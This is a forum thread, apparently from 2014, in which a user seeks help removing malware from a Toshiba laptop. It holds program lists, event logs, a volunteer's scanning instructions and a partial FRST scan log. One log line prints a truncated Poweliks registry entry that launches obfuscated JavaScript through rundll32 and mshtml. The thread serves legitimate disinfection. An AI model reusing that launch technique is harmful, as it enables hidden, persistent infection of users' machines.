AMD VISION Engine Control Center
Apple Application Support
Apple Mobile Device Support
Apple Software Update
AVG 2014
AVS Video Converter 8
Bandicam
Bandicut
Bandisoft MPEG-1 Decoder
Bonjour
Catalyst Control Center - Branding
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Localization All
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CutePDF Writer 3.0
D3DX10
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition
Emsisoft Anti-Malware
File Association Helper
Five Nights at Freddy's
FormsWorkFlow 2007
GamingWonderland Internet Explorer Toolbar
HP Officejet 6600 Basic Device Software
HP Officejet 6600 Help
HP Support Solutions Framework
I.R.I.S. OCR
iTunes
Java 7 Update 67 (64-bit)
Junk Mail filter update
Microsoft Application Error Reporting
Microsoft Office
Microsoft Office 2010 Service Pack 1 (SP1)
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Home and Student 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Single Image 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Movie Maker
MSVCRT
MSVCRT_amd64
MSVCRT110
MSVCRT110_amd64
Nikon Message Center 2
Nikon Movie Editor
Origin
Pdf995
Photo Common
Photo Gallery
Plants vs. Zombies - Game of the Year
PlayReady PC Runtime amd64
Premium Sound HD
Realtek Ethernet Controller Driver
Realtek High Definition Audio Driver
Realtek USB 2.0 Card Reader
Realtek WLAN Driver
Security Update for Microsoft Excel 2010 (KB2597126) 32-Bit Edition
Security Update for Microsoft InfoPath 2010 (KB2687417) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553091)
Security Update for Microsoft Office 2010 (KB2553096)
Security Update for Microsoft Office 2010 (KB2553371) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553447) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2589320) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2597986) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2598243) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687501) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687510) 32-Bit Edition
Security Update for Microsoft PowerPoint 2010 (KB2553185) 32-Bit Edition
Security Update for Microsoft Visio Viewer 2010 (KB2598287) 32-Bit Edition
Security Update for Microsoft Word 2010 (KB2760410) 32-Bit Edition
SPORE™
Steam
Synaptics Pointing Device Driver
The Sims™ 3
The Sims™ 3 Generations
The Sims™ 3 Late Night
The Sims™ 3 Pets
The Sims™ 3 Supernatural
The Sims™ 4
Toshiba App Place
TOSHIBA Application Installer
TOSHIBA Desktop Assist
TOSHIBA eco Utility
TOSHIBA Function Key
Toshiba Password Utility
TOSHIBA PC Health Monitor
TOSHIBA Quality Application
TOSHIBA Recovery Media Creator
TOSHIBA Resolution+ Plug-in for Windows Media Player
TOSHIBA Service Station
TOSHIBA System Driver
TOSHIBA System Settings
TOSHIBA User's Guide
TOSHIBA VIDEO PLAYER
TOSHIBARegistration
Unity Web Player
Update for Microsoft Office 2010 (KB2553065)
Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition
Update for Microsoft Office 2010 (KB2566458)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2687277) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition
ViewNX 2
Visual Studio 2010 x64 Redistributables
Visual Studio 2012 x64 Redistributables
Visual Studio 2012 x86 Redistributables
WildTangent Games
Windows Live Communications Platform
Windows Live Essentials
Windows Live Installer
Windows Live Mail
Windows Live MIME IFilter
Windows Live Photo Common
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
WinRAR 5.01 (64-bit)
WinZip 17.5
Wizard101
.
==== Event Viewer Messages From Past Week ========
.
10/9/2014 5:39:34 PM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.
10/9/2014 5:39:34 PM, Error: Service Control Manager [7000]  - The Steam Client Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
10/9/2014 3:54:29 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {4D111E08-CBF7-4F12-A926-2C7920AF52FC}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC}
10/9/2014 3:51:41 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {E96767E0-7EAA-45E1-8E7D-64414AFF281A}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{E96767E0-7EAA-45E1-8E7D-64414AFF281A}
10/9/2014 3:46:20 PM, Error: Schannel [36888]  - A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 80. The Windows SChannel error state is 301.
10/9/2014 2:27:37 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {BB46F03E-7CD2-489F-8F95-BB950F395FDB}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{16D99191-6280-4B33-A2F5-04805A0FC582}
10/9/2014 10:05:02 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
10/9/2014 10:04:39 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {76D0CB12-7604-4048-B83C-1005C7DDC503}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
10/8/2014 3:09:21 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
10/13/2014 9:50:01 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {30D49246-D217-465F-B00B-AC9DDD652EB7}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{30D49246-D217-465F-B00B-AC9DDD652EB7}
10/13/2014 10:25:09 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {ECF5BF46-E3B6-449A-B56B-43F58F867814}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
10/13/2014 10:17:30 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16.4.4206.722_x64__8wekyb3d8bbwe\LiveComm.exe" -ServerName:Microsoft.WindowsLive.Platform.Server
10/12/2014 11:17:43 AM, Error: Microsoft-Windows-HttpEvent [15006]  - Owner of the log file or directory \SystemRoot\System32\LogFiles\HTTPERR\httperr1.log is invalid. This could be because another user has already created the log file or the directory.
10/11/2014 9:55:44 PM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the HP Support Solutions Framework Service service to connect.
10/11/2014 9:55:44 PM, Error: Service Control Manager [7000]  - The HP Support Solutions Framework Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
10/11/2014 10:33:46 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: {581333F6-28DB-41BE-BC7A-FF201F12F3F6} as NT Authority/LocalService. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{478B41E6-3257-4519-BDA8-E971F9843849}
10/11/2014 10:30:30 PM, Error: Service Control Manager [7034]  - The Diagnostic System Host service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:30:30 PM, Error: Service Control Manager [7034]  - The Device Association Service service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The WLAN AutoConfig service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Windows Audio Endpoint Builder service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Superfetch service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Program Compatibility Assistant Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Human Interface Device Access service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The HomeGroup Listener service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The File History Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Distributed Link Tracking Client service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:29:33 PM, Error: Service Control Manager [7031]  - The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
10/11/2014 10:27:24 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {3AD05575-8857-4850-9277-11B85BDB8E09}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
10/11/2014 10:18:20 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0xc000021a (0xfffff8a00f31aa90, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\windows\MEMORY.DMP. Report Id: 101114-49483-01.
10/11/2014 10:15:38 PM, Error: Service Control Manager [7034]  - The Plug and Play service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:15:38 PM, Error: Service Control Manager [7034]  - The Local Session Manager service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:15:38 PM, Error: Service Control Manager [7031]  - The Power service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Reboot the machine.
10/11/2014 10:15:38 PM, Error: Service Control Manager [7031]  - The DCOM Server Process Launcher service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Reboot the machine.
10/11/2014 10:15:38 PM, Error: Service Control Manager [7031]  - The Background Tasks Infrastructure Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Reboot the machine.
10/11/2014 10:11:31 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {1F2E5C40-9550-11CE-99D2-00AA006E086C}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{1F2E5C40-9550-11CE-99D2-00AA006E086C}
10/10/2014 9:02:41 AM, Error: volmgr [46]  - Crash dump initialization failed!
10/10/2014 7:39:15 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}
10/10/2014 12:20:48 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {06622D85-6856-4460-8DE1-A81921B41C4B}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
10/10/2014 12:16:56 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {E95186C7-7D80-4311-843D-0702CBC8B1E4}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{E95186C7-7D80-4311-843D-0702CBC8B1E4}
10/10/2014 12:13:50 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: {BA7C0D29-81CA-4901-B450-634E20BB8C34} as Unavailable/Unavailable. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{AA0B85DA-FDDF-4272-8D1D-FF9B966D75B0}
10/10/2014 11:34:21 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {3519154C-227E-47F3-9CC9-12C3F05817F1}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{AD3EDBCA-0901-415B-82E9-C16D3B65E38C}
10/10/2014 10:19:19 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {0358B920-0AC7-461F-98F4-58E32CD89148}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
.
==== End Of File ===========================

 

 

I admit I turned off the DCOM server, but that was because I thought it was allowing the conhost file to run more than two instances (it would run 15 or so).

 

Also, this infected my Windows 7 computer, it seems to be missing the keyboard and mouse drivers, though the keyboard does work in DOS.  I haven't started on that one yet.

 

Thanks for any help you can give me.
 



BC AdBot (Login to Remove)

 


m

#2 TB-Psychotic

TB-Psychotic

  • Malware Response Team
  • 6,349 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:47 AM

Posted 14 October 2014 - 04:55 AM

Hi there,
my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

  • First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
  • My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

  • Important: To help me reviewing your logs, please post them in code boxes. You can create them by clicking on the <>-symbol on top of the reply window.

 
 
 
 
HijackThis is not the preferred initial scanning tool in this forum. With today's malware, a more comprehensive set of logs is required to determine the presence of malware.
 
 
  
Scan with FRST in normal mode

Please download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)
 
  • Run FRST.
  • Don´t change one of the checkboxes and hit Scan.
  • Logfiles are created on your desktop.
  • Poste the FRST.txt and (after the first scan only!) the Addition.txt.

 
 
Scan with Gmer rootkit scanner

Please download Gmer from here by clicking on the "Download EXE" Button.
  • Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.
  • If it gives you a warning about rootkit activity and asks if you want to run scan...click on NO.
  • In the right panel, you will see several boxes that have been checked. Uncheck the following ...
    • Sections
    • IAT/EAT
    • Show All ( should be unchecked by default )
  • Leave everything else as it is.
  • Close all other running programs as well as your Browser.
  • Click the Scan button & wait for it to finish.
  • Once done click on the Save.. button, and in the File name area, type in "ark.txt" or it will save as a .log file which cannot be uploaded to your post.
  • Save it where you can easily find it, such as your desktop.
  • Please post the content of the ark.txt here.

**Caution**
Rootkit scans often produce false positives. Do NOT take any action on any "<--- ROOKIT" entries

Scan with TDSS-Killer

Please read and follow these instructions carefully. We do not want it to fix anything yet (if found), we need to see a report first.

Download TDSSKiller.zip and extract to your desktop
  • Execute TDSSKiller.exe by doubleclicking on it.
  • Press Start Scan
  • If Malicious objects are found, do NOT select Copy to quarantine. Change the action to Skip, and save the log.
  • Once complete, a log will be produced at the root drive which is typically C:\ ,for example, C:\TDSSKiller.<version_date_time>log.txt


Please attach this file to your next reply.
 


Proud Member of UNITE & TB
 
My help is free, however, if you want to support my fight against malware, click here --> btn_donate_SM.gif <--(no worries, every little bit helps)

#3 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 14 October 2014 - 05:41 PM

Hi, and thanks for responding.

 

I was running FRST and AVG wanted to "protect me".  Should I disable my antivirus before running FRST, or do I tell AVG that FRST is from a trusted source? 

 

Thanks

 

Jeremy



#4 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 14 October 2014 - 10:55 PM

Hi again.

 

Well, I decided to create an exception for FRST64 and ran the scan. The reports follow, in the code box.

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 14-10-2014
Ran by Jeremy and Heidi (administrator) on TOSHIBA_LAPTOP on 14-10-2014 19:30:42
Running from C:\Users\Jeremy and Heidi\Downloads
Loaded Profile: Jeremy and Heidi (Available profiles: Jeremy and Heidi)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\Common\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoService.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\TMachInfo.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Hotkey\TCrdMain_Win8.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoResident.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHWMsg.exe
(TOSHIBA Corporation) C:\Program Files (x86)\Toshiba\System Setting\TSleepSrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgui.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\ToshibaServiceStation.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12936848 2012-07-13] (Realtek Semiconductor)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170784 2012-07-27] (SRS Labs, Inc.)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2608040 2012-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [169896 2012-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [356776 2012-07-11] (TOSHIBA Corporation)
HKLM\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSleepSrv.exe [1548952 2012-08-04] (TOSHIBA Corporation)
HKLM\...\Run: [TODDMain] => C:\Program Files (x86)\TOSHIBA\System Setting\TODDMain.exe [213136 2012-08-04] ()
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [642216 2012-08-08] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2014\avgui.exe [5188112 2014-08-25] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-05-15] (Apple Inc.)
HKLM-x32\...\Run: [GamingWonderland EPM Support] => "C:\PROGRA~2\GAMING~2\bar\1.bin\gtmedint.exe" T8EPMSUP.DLL,S
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [570880 2013-12-27] (Nikon Corporation)
HKLM-x32\...\Run: [emsisoft anti-malware] => c:\program files (x86)\emsisoft anti-malware\a2guard.exe [4873248 2014-10-13] (Emsisoft GmbH)
HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll File Not Found
Startup: C:\Users\Jeremy and Heidi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://facebook.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
SearchScopes: HKLM - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
